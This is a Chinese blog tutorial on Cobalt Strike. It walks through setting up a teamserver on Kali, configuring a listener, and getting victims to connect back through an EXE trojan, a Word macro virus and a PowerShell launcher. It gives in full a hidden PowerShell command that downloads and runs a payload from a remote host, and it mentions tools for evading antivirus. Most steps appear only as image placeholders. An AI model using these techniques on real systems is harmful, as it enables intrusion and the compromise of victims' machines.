cobaltstrike工具

cobalt strike工具

c two 工具:

命令和控制的一个终端工具

cobalt strike:

metasploit 内网渗透纯图形化

在这里插入图片描述

‘打开存储位置,将server进行压缩成zip文件(否则火绒等安全工具直接杀掉)

在这里插入图片描述

解释:

在这里插入图片描述

复制到kali中进行解压缩。

在这里插入图片描述

对teamserver进行赋权,

在这里插入图片描述

输入kali 的IP和密码:

在这里插入图片描述

点击cobalt strike:工具:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

端口号:50050

在这里插入图片描述

上线手法:

1.EXE:

点击windows stager payload

在这里插入图片描述

点击进去发现都需要listeners,我们设置一下listeners

回到kali中查看一下开放的端口:

在这里插入图片描述

当木马执行以后,他去找谁要命令?,建立了一个6666端口(可以建立多个端口)

在这里插入图片描述

回到kali中可以看到刚开放的6666端口:

在这里插入图片描述

现在回去生成木马:

在这里插入图片描述

生成一个.exe的木马执行文件点击之后我们在cobalt strike 中就可以看到反弹受害者信息

在这里插入图片描述

在这里插入图片描述

2.宏病毒:

新建一个word文档在视图选项卡—宏中添加宏
在这里插入图片描述点击之后复制木马粘贴到宏中

在这里插入图片描述

保存完成之后双击一下word文件回到虚拟机找那个发现已经反弹上去了

在这里插入图片描述

在这里插入图片描述

3.Powershell:

在这里插入图片描述

提供了一个网页进攻的站

在这里插入图片描述

点击launch,可以看一下

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.9.47.130:80/a'))"

在这里插入图片描述

在这里插入图片描述

点击确定就会发现界面反弹出来记录信息

在这里插入图片描述

这就是上线的木马

在这里插入图片描述

shellcode:

最实用,网络上范围最广的是payload generator

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

放到左面记事本打开看一下:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

使用工具做免杀:

图片转存中…(img-0xLayHKu-1702388297713)]

[外链图片转存中…(img-r4GoHxs1-1702388297713)]

[外链图片转存中…(img-ObdytB8A-1702388297713)]

使用工具做免杀:

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值